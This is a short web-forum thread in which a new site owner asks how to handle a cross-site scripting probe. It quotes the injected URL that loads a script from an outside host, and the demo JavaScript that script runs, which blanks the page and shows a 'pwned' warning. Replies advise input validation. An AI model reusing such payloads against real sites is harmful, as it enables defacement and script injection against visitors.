How can I fix this? I don't want to get hacked...

[aaricwon]

I am very new and have learned alot from you guys. Thank you!

 

I started working on www.bjjnews.org/TUF and posted it on the Beta Test forum and someone replied to my post with this:

 

http://www.bjjnews.org/TUF/index.php?page=2%3Cscript%20src=http://www.helraizer.co.uk/xss1.js%3E%3C/script%3E

[redarrow]

you not been hacked all they done was add a url to a forum and trie to scere you childs play..

 

HERE THERE BOARING JAVASCRIPT CODE

window.onload = function() {
var eles = document.getElementsByTagName('body');
eles[0].innerHTML = '';

var mainDiv   = document.createElement('DIV');
var mainStyle = "margin: 40px auto; width: 300px; border: 1px solid #000000; padding: 15px; background-color: #f4f4f4; font-family: 'Trebuchet MS', Arial, Verdana, sans-serif; font-size: 11px; color: #454545;";

mainDiv.setAttribute('style', mainStyle);

document.body.appendChild(mainDiv);
mainDiv.innerHTML = '<h1 style="font-family: Georgia, Helvetia, serif; color: #770000; font-size: 18px; font-weight: normal; margin: 5px 0 10px;">Vunerable - Potentially Pwned</h1><p>This is an example of XSS, you need to protect against this or your site could be completely and utterly pwned. <br> That is all! <br><br> Ciao!</p>';

document.title = "This site has been pwned!";
  
}

[awpti]

Input validation.

 

Validate, validate and then validate some more. And then validate that it was validated. You can't validate user input enough.

 

Look it up, lots of topics covering PHP/Input Validation